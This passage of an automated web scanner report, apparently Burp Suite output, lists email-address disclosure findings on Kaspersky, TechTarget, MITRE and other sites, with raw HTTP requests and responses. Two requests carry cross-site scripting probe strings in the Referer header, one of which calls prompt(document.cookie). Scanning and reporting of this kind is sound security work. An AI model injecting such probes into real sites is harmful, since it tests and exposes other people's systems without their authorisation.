Host:	http://usa.kaspersky.com
Path:	/store/index.html

Issue detail

The following email address was disclosed in the response:

newvirus@kaspersky.com

Request

GET /store/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:04:21 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145061"
Content-Type: text/html; charset=utf-8
Content-Length: 36177
Date: Sun, 04 Sep 2011 14:04:29 GMT
X-Varnish: 1163241738
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<a href="mailto:newvirus@kaspersky.com">
...[SNIP]...

19.55. http://usa.kaspersky.com/store/kaspersky-store previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/store/kaspersky-store

Issue detail

The following email addresses were disclosed in the response:

katelyn.fogarty@kaspersky.com
newvirus@kaspersky.com

Request

Response

19.56. http://users.techtarget.com/registration/searchsecurity/InlineRegister.page previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://users.techtarget.com
Path:	/registration/searchsecurity/InlineRegister.page

Issue detail

The following email addresses were disclosed in the response:

webmaster@TechTarget.com
webmaster@techtarget.com

Request

GET /registration/searchsecurity/InlineRegister.page?type=inlineregister&callback=inlineCallback&div=inlineRegistration&pageNumber=1 HTTP/1.1
Host: users.techtarget.com
Proxy-Connection: keep-alive
Referer: http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: googFCF=a37ee93fdfdd1310VgnVCM1000000d01c80aRCRD; referrer=referrerhttp%3A%2F%2Fwww.google.com%2F%23sclient%3Dpsy%26hl%3Den%26tbm%3Dnws%26source%3Dhp%26q%3D%2522xss.cx%2522%26pbx%3D1%26oq%3D%2522xss.cx%2522%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%26fp%3D1%26biw%3D1407%26bih%3D931%26bav%3Don.2%2Cor.r_gc.r_pw.%26cad%3Db%3Bkeyword%2522xss.cx%2522%3Basrc%3Beid%0A; tt_prereg=t1@299972%24t2@301219%24_2011-09-04%2007%3A14%3A05%26g%3D2240040538

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
ETag: 9s3zhJPtHtlum8THk2Omj44HV%2B82iqDNAxj3vT5rEzoog644MyV3o3Kf45MRLmS4pnJA2dkufoNnvOYAh8SNeE7mjvUjHDQuvabJHgXzNhs%3D
Cache-Control: max-age=43200
Cache-Control: private
Expires: Mon, 05 Sep 2011 00:14:54 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 10116
Date: Sun, 04 Sep 2011 12:14:54 GMT

inlineCallback('inlineRegistration', [{"contentType":"BLOCK","CONTENT":"<style>\r\n.inlineReg_new form input {width:250px;}\r\n.inlineReg_new .inlineRegHeader h4 {font-size:19px}\r\n<\/style>\r\n <
...[SNIP]...
<a href=\"mailto:webmaster@techtarget.com\">webmaster@TechTarget.com<\/a>
...[SNIP]...

19.57. http://users.techtarget.com/registration/searchsecurity/Register.page previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://users.techtarget.com
Path:	/registration/searchsecurity/Register.page

Issue detail

The following email addresses were disclosed in the response:

webmaster@TechTarget.com
webmaster@techtarget.com

Request

GET /registration/searchsecurity/Register.page HTTP/1.1
Host: users.techtarget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Connection: close
Date: Sun, 04 Sep 2011 14:04:46 GMT
Content-Length: 48912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--
_____ _ _____ < Registration > _
[_ _]___ ___| |___ [
...[SNIP]...
<a href="mailto:webmaster@techtarget.com">webmaster@TechTarget.com</a>
...[SNIP]...

19.58. http://wd.sharethis.com/button/buttons.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wd.sharethis.com
Path:	/button/buttons.js

Issue detail

The following email address was disclosed in the response:

support@sharethis.com

Request

GET /button/buttons.js?_=1315138468625 HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==; __uset=yes

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sun, 04 Sep 2011 12:16:32 GMT
Content-Type: application/x-javascript
Connection: keep-alive
Expires: Mon, 05 Sep 2011 12:16:32 GMT
Cache-Control: max-age=86400
Content-Length: 58953

var cookie=new function(){return{setCookie:function(d,f,h){if(h){var c=new Date();c.setTime(c.getTime()+(h*24*60*60*1000));var a="; expires="+c.toGMTString()}else{var a=""}var b=d+"="+escape(f)+a;var
...[SNIP]...
rn false}stLight.processSTQ();stLight.readyRun=true;if(stLight.publisher==null){if(typeof(window.console)!=="undefined"){try{console.debug("Please specify a ShareThis Publisher Key \nFor help, contact support@sharethis.com")}catch(a){}}}var b=stLight.getSource();stLight.log("pview",b,"");stWidget.options.sessionID=stLight.sessionID;stWidget.options.fpc=stLight.fpc;stLight.loadServicesLoggedIn(function(){stButtons.onRead
...[SNIP]...

19.59. http://www.2linkme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.2linkme.com
Path:	/

Issue detail

The following email address was disclosed in the response:

contact@2linkme.com

Request

GET / HTTP/1.1
Host: www.2linkme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.60. http://www.cloudscan.me/feeds/posts/default previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudscan.me
Path:	/feeds/posts/default

Issue detail

The following email addresses were disclosed in the response:

noreply@blogger.com
webmaster@senate.gov

Request

GET /feeds/posts/default HTTP/1.1
Host: www.cloudscan.me
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/atom+xml
Expires: Sun, 04 Sep 2011 14:06:22 GMT
Date: Sun, 04 Sep 2011 14:06:22 GMT
Cache-Control: private, max-age=0
Last-Modified: Sun, 04 Sep 2011 12:37:40 GMT
ETag: W/"A08CQXY7fSl7ImA9WhdWEU4."
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/o
...[SNIP]...
<email>noreply@blogger.com</email>
...[SNIP]...
<email>noreply@blogger.com</email>
...[SNIP]...
<email>noreply@blogger.com</email>
...[SNIP]...
<email>noreply@blogger.com</email>
...[SNIP]...
<email>noreply@blogger.com</email>
...[SNIP]...
<email>noreply@blogger.com</email>
...[SNIP]...
<email>noreply@blogger.com</email>
...[SNIP]...
<email>noreply@blogger.com</email>
...[SNIP]...
<email>noreply@blogger.com</email>
...[SNIP]...
<email>noreply@blogger.com</email>
...[SNIP]...
<email>noreply@blogger.com</email>
...[SNIP]...
<email>noreply@blogger.com</email>
...[SNIP]...
<email>noreply@blogger.com</email>
...[SNIP]...
<email>noreply@blogger.com</email>
...[SNIP]...
<email>noreply@blogger.com</email>
...[SNIP]...
<email>noreply@blogger.com</email>
...[SNIP]...
<email>noreply@blogger.com</email>
...[SNIP]...
<email>noreply@blogger.com</email>
...[SNIP]...
<email>noreply@blogger.com</email>
...[SNIP]...
<email>noreply@blogger.com</email>
...[SNIP]...
<email>noreply@blogger.com</email>
...[SNIP]...
Arial, Helvetica, Geneva, sans-serif;"><br /></span><br /><span class="Apple-style-span" style="font-family: Verdana, Arial, Helvetica, Geneva, sans-serif;">XSS.CX notified webmaster@senate.gov 3 times in 12 months.. unresponsive..&nbsp;</span><br /><span class="Apple-style-span" style="font-family: Verdana, Arial, Helvetica, Geneva, sans-serif;"><br /></span&g
...[SNIP]...
<email>noreply@blogger.com</email>
...[SNIP]...
<email>noreply@blogger.com</email>
...[SNIP]...
<email>noreply@blogger.com</email>
...[SNIP]...
<email>noreply@blogger.com</email>
...[SNIP]...
<email>noreply@blogger.com</email>
...[SNIP]...

19.61. http://www.computerworld.com/secure-us.imrworldwide.com/cgi-bin/m previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.computerworld.com
Path:	/secure-us.imrworldwide.com/cgi-bin/m

Issue detail

The following email address was disclosed in the response:

online@computerworld.com

Request

GET /secure-us.imrworldwide.com/cgi-bin/m HTTP/1.1
Host: www.computerworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.62. http://www.cve.mitre.org/cgi-bin/cvename.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cve.mitre.org
Path:	/cgi-bin/cvename.cgi

Issue detail

The following email address was disclosed in the response:

cve@mitre.org

Request

GET /cgi-bin/cvename.cgi HTTP/1.1
Host: www.cve.mitre.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:06:31 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 12356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="iso-8859-1"?>
<html xmlns="http://www.w3.org/1
...[SNIP]...
<a href="mailto:cve@mitre.org">
...[SNIP]...
<a style="text-decoration:underline" href="mailto:cve@mitre.org">cve@mitre.org</a>
...[SNIP]...
<a href="mailto:cve@mitre.org">cve@mitre.org</a>
...[SNIP]...
<a href="mailto:cve@mitre.org">
...[SNIP]...

19.63. http://www.h-online.com/security/news/item/phpMyAdmin-updates-close-XSS-hole-1331093.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.h-online.com
Path:	/security/news/item/phpMyAdmin-updates-close-XSS-hole-1331093.html

Issue detail

The following email address was disclosed in the response:

crve@h-online.com

Request

Response

19.64. http://www.h-online.com/userdb/sso previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.h-online.com
Path:	/userdb/sso

Issue detail

The following email address was disclosed in the response:

registration@h-online.com

Request

GET /userdb/sso HTTP/1.1
Host: www.h-online.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:06:41 GMT
Server: Apache
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

<meta http-
...[SNIP]...
<a href="mailto:registration@h-online.com?subject=Registration">
...[SNIP]...

19.65. http://www.itwhitepapers.com/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.itwhitepapers.com
Path:	/s_code.js

Issue detail

The following email address was disclosed in the response:

id@Ls.tc

Request

GET /s_code.js HTTP/1.1
Host: www.itwhitepapers.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itwhitepapers.com/index.phpb5ac2%22-prompt(%22Fool%22)-%221c3a60ce1ff
Cookie: PHPSESSID=apjgghpsi7e8kapncc03aq4l16; 2f1511d467aa3beecdd06ea6e9b79919=a26b837c116af36b6395df4561ff0dda

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:47:18 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Thu, 17 Jun 2010 16:01:26 GMT
ETag: "138d06c-400b-4893bf35ee180"
Accept-Ranges: bytes
Content-Length: 16395
Connection: close
Content-Type: application/x-javascript

/* SiteCatalyst code version: H.17.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */

var s_account="infoworlditwhitepapers"
var s=s_gi(s_account)
/**********
...[SNIP]...
hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L
...[SNIP]...

19.66. http://www.kaspersky.com/news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kaspersky.com
Path:	/news

Issue detail

The following email address was disclosed in the response:

newvirus@kaspersky.com

Request

GET /news HTTP/1.1
Host: www.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 46610
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: Kaspersky Lab
Date: Sun, 04 Sep 2011 14:07:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Ty
...[SNIP]...
<a href="mailto:newvirus@kaspersky.com" >
...[SNIP]...

19.67. http://www.kaspersky.com/productupdates previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kaspersky.com
Path:	/productupdates

Issue detail

The following email address was disclosed in the response:

newvirus@kaspersky.com

Request

GET /productupdates HTTP/1.1
Host: www.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39081
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: Kaspersky Lab
Date: Sun, 04 Sep 2011 14:07:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Ty
...[SNIP]...
<a href="mailto:newvirus@kaspersky.com" >
...[SNIP]...

19.68. http://www.kaspersky.com/pure-trial-register previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kaspersky.com
Path:	/pure-trial-register

Issue detail

The following email address was disclosed in the response:

newvirus@kaspersky.com

Request

GET /pure-trial-register HTTP/1.1
Host: www.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26524
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: Kaspersky Lab
Date: Sun, 04 Sep 2011 14:06:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Ty
...[SNIP]...
<a href="mailto:newvirus@kaspersky.com" >
...[SNIP]...

19.69. http://www.lexjansen.com/script/niftycube.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lexjansen.com
Path:	/script/niftycube.js

Issue detail

The following email address was disclosed in the response:

a.fulciniti@html.it

Request

GET /script/niftycube.js HTTP/1.1
Host: www.lexjansen.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lexjansen.com/

Response

HTTP/1.1 200 OK
Content-Length: 8899
Content-Type: application/x-javascript
Content-Location: http://www.lexjansen.com/script/niftycube.js
Last-Modified: Thu, 16 Sep 2010 01:28:34 GMT
Accept-Ranges: bytes
ETag: "4c1e17a3e55cb1:4d2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 14:36:49 GMT

/* Nifty Corners Cube - rounded corners with CSS and Javascript
Copyright 2006 Alessandro Fulciniti (a.fulciniti@html.it)

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the Li
...[SNIP]...

19.70. http://www.lexjansen.com/virus/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lexjansen.com
Path:	/virus/

Issue detail

The following email addresses were disclosed in the response:

companyname@example.com
sans@example.com
user+sans@example.com

Request

Response

19.71. http://www.networkworld.com/includes/jqlib/exp_nwLib_tail-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.networkworld.com
Path:	/includes/jqlib/exp_nwLib_tail-min.js

Issue detail

The following email address was disclosed in the response:

webops@idgenterprise.com

Request

GET /includes/jqlib/exp_nwLib_tail-min.js HTTP/1.1
Host: www.networkworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1
Cookie: Apache=50.23.123.106.1315147426262493; mobify=0

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Cteonnt-Length: 64149
nnCoection: close
Content-Type: application/x-javascript
Content-Length: 64149
Vary: Accept-Encoding
Expires: Sun, 04 Sep 2011 14:46:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 14:46:27 GMT
Connection: close

NW.SearchWidget=NW.SearchWidget||{};NW.SearchWidget=function(){var D="search_box";var F=null;var B=null;var E=null;var A=4;var C={site:[{name:"GOOGLE.COM",searchvar:"q"},{name:"NWW.COM",searchvar:"qt"
...[SNIP]...
<p>Please contact webops@idgenterprise.com</p>
...[SNIP]...

19.72. http://www.phonefactor.com/whitepaper-search-auth-revolution previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.phonefactor.com
Path:	/whitepaper-search-auth-revolution

Issue detail

The following email address was disclosed in the response:

marketing@phonefactor.com

Request

GET /whitepaper-search-auth-revolution HTTP/1.1
Host: www.phonefactor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.73. http://www.scmagazine.com.au/Scripts/jquery.cookie.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scmagazine.com.au
Path:	/Scripts/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

klaus.hartl@stilbuero.de

Request

GET /Scripts/jquery.cookie.js HTTP/1.1
Host: www.scmagazine.com.au
Proxy-Connection: keep-alive
Referer: http://www.scmagazine.com.au/News/268907,kaspersky-website-vulnerable-to-xss.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NZVLWMSweb2CKIKM; Q291bnRyeQ0K=220; ASP.NET_SessionId=bfnxibaku1orgt45l5q55sbj

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 05 Jul 2011 02:16:40 GMT
Accept-Ranges: bytes
ETag: "0343593b93acc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 12:12:50 GMT
Content-Length: 4246

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

19.74. http://www.sophelle.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/

Issue detail

The following email address was disclosed in the response:

info@sophelle.com

Request

GET / HTTP/1.1
Host: www.sophelle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Content-Length: 13673
Content-Type: text/html
Content-Location: http://www.sophelle.com/index.html
Last-Modified: Wed, 31 Aug 2011 16:06:08 GMT
Accept-Ranges: bytes
ETag: "1a1549e5f767cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 14:53:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="shortcut icon"
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

19.75. http://www.sophelle.com/Company/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/Company/

Issue detail

The following email address was disclosed in the response:

info@sophelle.com

Request

GET /Company/ HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Success-Stories/Project-Lifecycle-Re-Engineering.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotdt=2011-09-04%2010%3A56%3A09; __utma=227204639.668059565.1315148193.1315148193.1315148193.1; __utmb=227204639.8.10.1315148193; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Length: 8346
Content-Type: text/html
Content-Location: http://www.sophelle.com/Company/index.html
Last-Modified: Tue, 26 Apr 2011 13:15:40 GMT
Accept-Ranges: bytes
ETag: "c8f88a144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 14:54:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="shortcut icon"
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

19.76. http://www.sophelle.com/Contact-Us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/Contact-Us/

Issue detail

The following email address was disclosed in the response:

info@sophelle.com

Request

Response

HTTP/1.1 200 OK
Content-Length: 10039
Content-Type: text/html
Content-Location: http://www.sophelle.com/Contact-Us/index.html
Last-Modified: Tue, 26 Apr 2011 13:15:36 GMT
Accept-Ranges: bytes
ETag: "a042c37144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 14:54:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="shortcut icon"
...[SNIP]...
<a href="mailto:info@sophelle.com">info@sophelle.com</a>
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

19.77. http://www.sophelle.com/Contact-Us/thank-you.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/Contact-Us/thank-you.html

Issue detail

The following email address was disclosed in the response:

info@sophelle.com

Request

GET /Contact-Us/thank-you.html HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Contact-Us/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; __utma=227204639.668059565.1315148193.1315148193.1315148193.1; __utmb=227204639.5.10.1315148193; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-04%2010%3A56%3A09

Response

HTTP/1.1 200 OK
Content-Length: 5435
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:15:37 GMT
Accept-Ranges: bytes
